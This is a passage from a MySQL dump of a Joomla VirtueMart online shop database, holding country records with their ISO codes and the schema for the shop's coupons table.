00:00:00',0),(57,1,'Denmark','DNK','DK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(58,1,'Djibouti','DJI','DJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(59,1,'Dominica','DMA','DM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(60,1,'Dominican Republic','DOM','DO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(61,1,'East Timor','TMP','TP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(62,1,'Ecuador','ECU','EC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(63,1,'Egypt','EGY','EG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(64,1,'El Salvador','SLV','SV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(65,1,'Equatorial Guinea','GNQ','GQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(66,1,'Eritrea','ERI','ER',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(67,1,'Estonia','EST','EE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(68,1,'Ethiopia','ETH','ET',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(69,1,'Falkland Islands (Malvinas)','FLK','FK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(70,1,'Faroe Islands','FRO','FO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(71,1,'Fiji','FJI','FJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(72,1,'Finland','FIN','FI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(73,1,'France','FRA','FR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(75,1,'French Guiana','GUF','GF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(76,1,'French Polynesia','PYF','PF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(77,1,'French Southern Territories','ATF','TF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(78,1,'Gabon','GAB','GA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(79,1,'Gambia','GMB','GM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(80,1,'Georgia','GEO','GE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(81,1,'Germany','DEU','DE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(82,1,'Ghana','GHA','GH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(83,1,'Gibraltar','GIB','GI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(84,1,'Greece','GRC','GR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(85,1,'Greenland','GRL','GL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(86,1,'Grenada','GRD','GD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(87,1,'Guadeloupe','GLP','GP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(88,1,'Guam','GUM','GU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(89,1,'Guatemala','GTM','GT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(90,1,'Guinea','GIN','GN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(91,1,'Guinea-bissau','GNB','GW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(92,1,'Guyana','GUY','GY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(93,1,'Haiti','HTI','HT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(94,1,'Heard and Mc Donald Islands','HMD','HM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(95,1,'Honduras','HND','HN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(96,1,'Hong Kong','HKG','HK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(97,1,'Hungary','HUN','HU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(98,1,'Iceland','ISL','IS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(99,1,'India','IND','IN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(100,1,'Indonesia','IDN','ID',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(101,1,'Iran (Islamic Republic of)','IRN','IR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(102,1,'Iraq','IRQ','IQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(103,1,'Ireland','IRL','IE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(104,1,'Israel','ISR','IL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(105,1,'Italy','ITA','IT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(106,1,'Jamaica','JAM','JM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(107,1,'Japan','JPN','JP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(108,1,'Jordan','JOR','JO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(109,1,'Kazakhstan','KAZ','KZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(110,1,'Kenya','KEN','KE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(111,1,'Kiribati','KIR','KI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(112,1,'Korea, Democratic People\'s Republic of','PRK','KP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(113,1,'Korea, Republic of','KOR','KR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(114,1,'Kuwait','KWT','KW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(115,1,'Kyrgyzstan','KGZ','KG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(116,1,'Lao People\'s Democratic Republic','LAO','LA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(117,1,'Latvia','LVA','LV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(118,1,'Lebanon','LBN','LB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(119,1,'Lesotho','LSO','LS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(120,1,'Liberia','LBR','LR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(121,1,'Libya','LBY','LY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(122,1,'Liechtenstein','LIE','LI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(123,1,'Lithuania','LTU','LT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(124,1,'Luxembourg','LUX','LU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(125,1,'Macau','MAC','MO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(126,1,'Macedonia, The Former Yugoslav Republic of','MKD','MK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(127,1,'Madagascar','MDG','MG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(128,1,'Malawi','MWI','MW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(129,1,'Malaysia','MYS','MY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(130,1,'Maldives','MDV','MV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(131,1,'Mali','MLI','ML',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(132,1,'Malta','MLT','MT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(133,1,'Marshall Islands','MHL','MH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(134,1,'Martinique','MTQ','MQ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(135,1,'Mauritania','MRT','MR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(136,1,'Mauritius','MUS','MU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(137,1,'Mayotte','MYT','YT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(138,1,'Mexico','MEX','MX',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(139,1,'Micronesia, Federated States of','FSM','FM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(140,1,'Moldova, Republic of','MDA','MD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(141,1,'Monaco','MCO','MC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(142,1,'Mongolia','MNG','MN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(143,1,'Montserrat','MSR','MS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(144,1,'Morocco','MAR','MA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(145,1,'Mozambique','MOZ','MZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(146,1,'Myanmar','MMR','MM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(147,1,'Namibia','NAM','NA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(148,1,'Nauru','NRU','NR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(149,1,'Nepal','NPL','NP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(150,1,'Netherlands','NLD','NL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(151,1,'Netherlands Antilles','ANT','AN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(152,1,'New Caledonia','NCL','NC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(153,1,'New Zealand','NZL','NZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(154,1,'Nicaragua','NIC','NI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(155,1,'Niger','NER','NE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(156,1,'Nigeria','NGA','NG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(157,1,'Niue','NIU','NU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(158,1,'Norfolk Island','NFK','NF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(159,1,'Northern Mariana Islands','MNP','MP',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(160,1,'Norway','NOR','NO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(161,1,'Oman','OMN','OM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(162,1,'Pakistan','PAK','PK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(163,1,'Palau','PLW','PW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(164,1,'Panama','PAN','PA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(165,1,'Papua New Guinea','PNG','PG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(166,1,'Paraguay','PRY','PY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(167,1,'Peru','PER','PE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(168,1,'Philippines','PHL','PH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(169,1,'Pitcairn','PCN','PN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(170,1,'Poland','POL','PL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(171,1,'Portugal','PRT','PT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(172,1,'Puerto Rico','PRI','PR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(173,1,'Qatar','QAT','QA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(174,1,'Reunion','REU','RE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(175,1,'Romania','ROM','RO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(176,1,'Russian Federation','RUS','RU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(177,1,'Rwanda','RWA','RW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(178,1,'Saint Kitts and Nevis','KNA','KN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(179,1,'Saint Lucia','LCA','LC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(180,1,'Saint Vincent and the Grenadines','VCT','VC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(181,1,'Samoa','WSM','WS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(182,1,'San Marino','SMR','SM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(183,1,'Sao Tome and Principe','STP','ST',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(184,1,'Saudi Arabia','SAU','SA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(185,1,'Senegal','SEN','SN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(186,1,'Seychelles','SYC','SC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(187,1,'Sierra Leone','SLE','SL',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(188,1,'Singapore','SGP','SG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(189,1,'Slovakia','SVK','SK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(190,1,'Slovenia','SVN','SI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(191,1,'Solomon Islands','SLB','SB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(192,1,'Somalia','SOM','SO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(193,1,'South Africa','ZAF','ZA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(194,1,'South Georgia and the South Sandwich Islands','SGS','GS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(195,1,'Spain','ESP','ES',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(196,1,'Sri Lanka','LKA','LK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(197,1,'St. Helena','SHN','SH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(198,1,'St. Pierre and Miquelon','SPM','PM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(199,1,'Sudan','SDN','SD',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(200,1,'Suriname','SUR','SR',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(201,1,'Svalbard and Jan Mayen Islands','SJM','SJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(202,1,'Swaziland','SWZ','SZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(203,1,'Sweden','SWE','SE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(204,1,'Switzerland','CHE','CH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(205,1,'Syrian Arab Republic','SYR','SY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(206,1,'Taiwan','TWN','TW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(207,1,'Tajikistan','TJK','TJ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(208,1,'Tanzania, United Republic of','TZA','TZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(209,1,'Thailand','THA','TH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(210,1,'Togo','TGO','TG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(211,1,'Tokelau','TKL','TK',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(212,1,'Tonga','TON','TO',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(213,1,'Trinidad and Tobago','TTO','TT',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(214,1,'Tunisia','TUN','TN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(215,0,'Turkey','TUR','TR',0,1,'0000-00-00 00:00:00',0,'2017-11-05 11:36:58',676,'0000-00-00 00:00:00',0),(216,1,'Turkmenistan','TKM','TM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(217,1,'Turks and Caicos Islands','TCA','TC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(218,1,'Tuvalu','TUV','TV',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(219,1,'Uganda','UGA','UG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(220,1,'Ukraine','UKR','UA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(221,1,'United Arab Emirates','ARE','AE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(222,1,'United Kingdom','GBR','GB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(223,1,'United States','USA','US',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(224,1,'United States Minor Outlying Islands','UMI','UM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(225,1,'Uruguay','URY','UY',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(226,1,'Uzbekistan','UZB','UZ',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(227,1,'Vanuatu','VUT','VU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(228,1,'Vatican City State (Holy See)','VAT','VA',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(229,1,'Venezuela','VEN','VE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(230,1,'Viet Nam','VNM','VN',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(231,1,'Virgin Islands (British)','VGB','VG',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(232,1,'Virgin Islands (U.S.)','VIR','VI',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(233,1,'Wallis and Futuna Islands','WLF','WF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(234,1,'Western Sahara','ESH','EH',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(235,1,'Yemen','YEM','YE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(237,1,'The Democratic Republic of Congo','DRC','DC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(238,1,'Zambia','ZMB','ZM',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(239,1,'Zimbabwe','ZWE','ZW',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(240,1,'East Timor','XET','XE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(241,1,'Jersey','JEY','JE',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(242,1,'St. Barthelemy','XSB','XB',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(243,1,'St. Eustatius','XSE','XU',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(244,1,'Canary Islands','XCA','XC',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(245,1,'Serbia','SRB','RS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(246,1,'Sint Maarten (French Antilles)','MAF','MF',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(247,1,'Sint Maarten (Netherlands Antilles)','SXM','SX',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(248,1,'Palestinian Territory, occupied','PSE','PS',0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_coupons`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_coupons`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_coupons` (
  `virtuemart_coupon_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL,
  `coupon_code` varchar(32) NOT NULL DEFAULT '',
  `percent_or_total` enum('percent','total') NOT NULL DEFAULT 'percent',
  `coupon_type` enum('gift','permanent') NOT NULL DEFAULT 'gift',
  `coupon_value` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `coupon_start_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `coupon_expiry_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `coupon_value_valid` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `coupon_used` varchar(200) NOT NULL DEFAULT '',
  `coupon_value_max` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `virtuemart_shoppergroup_ids` text NOT NULL,
  `virtuemart_shopper_ids` text NOT NULL,
  `virtuemart_product_ids` text NOT NULL,
  `virtuemart_category_ids` text NOT NULL,
  `virtuemart_coupon_max_attempt_per_user` tinyint NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_coupon_id`),
  KEY `coupon_code` (`coupon_code`),
  KEY `coupon_type` (`coupon_type`),
  KEY `published` (`published`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='Used to store coupon codes';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_coupons`
--

LOCK TABLES `fz6t4_virtuemart_coupons` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_coupons` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_coupons` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_currencies`
--

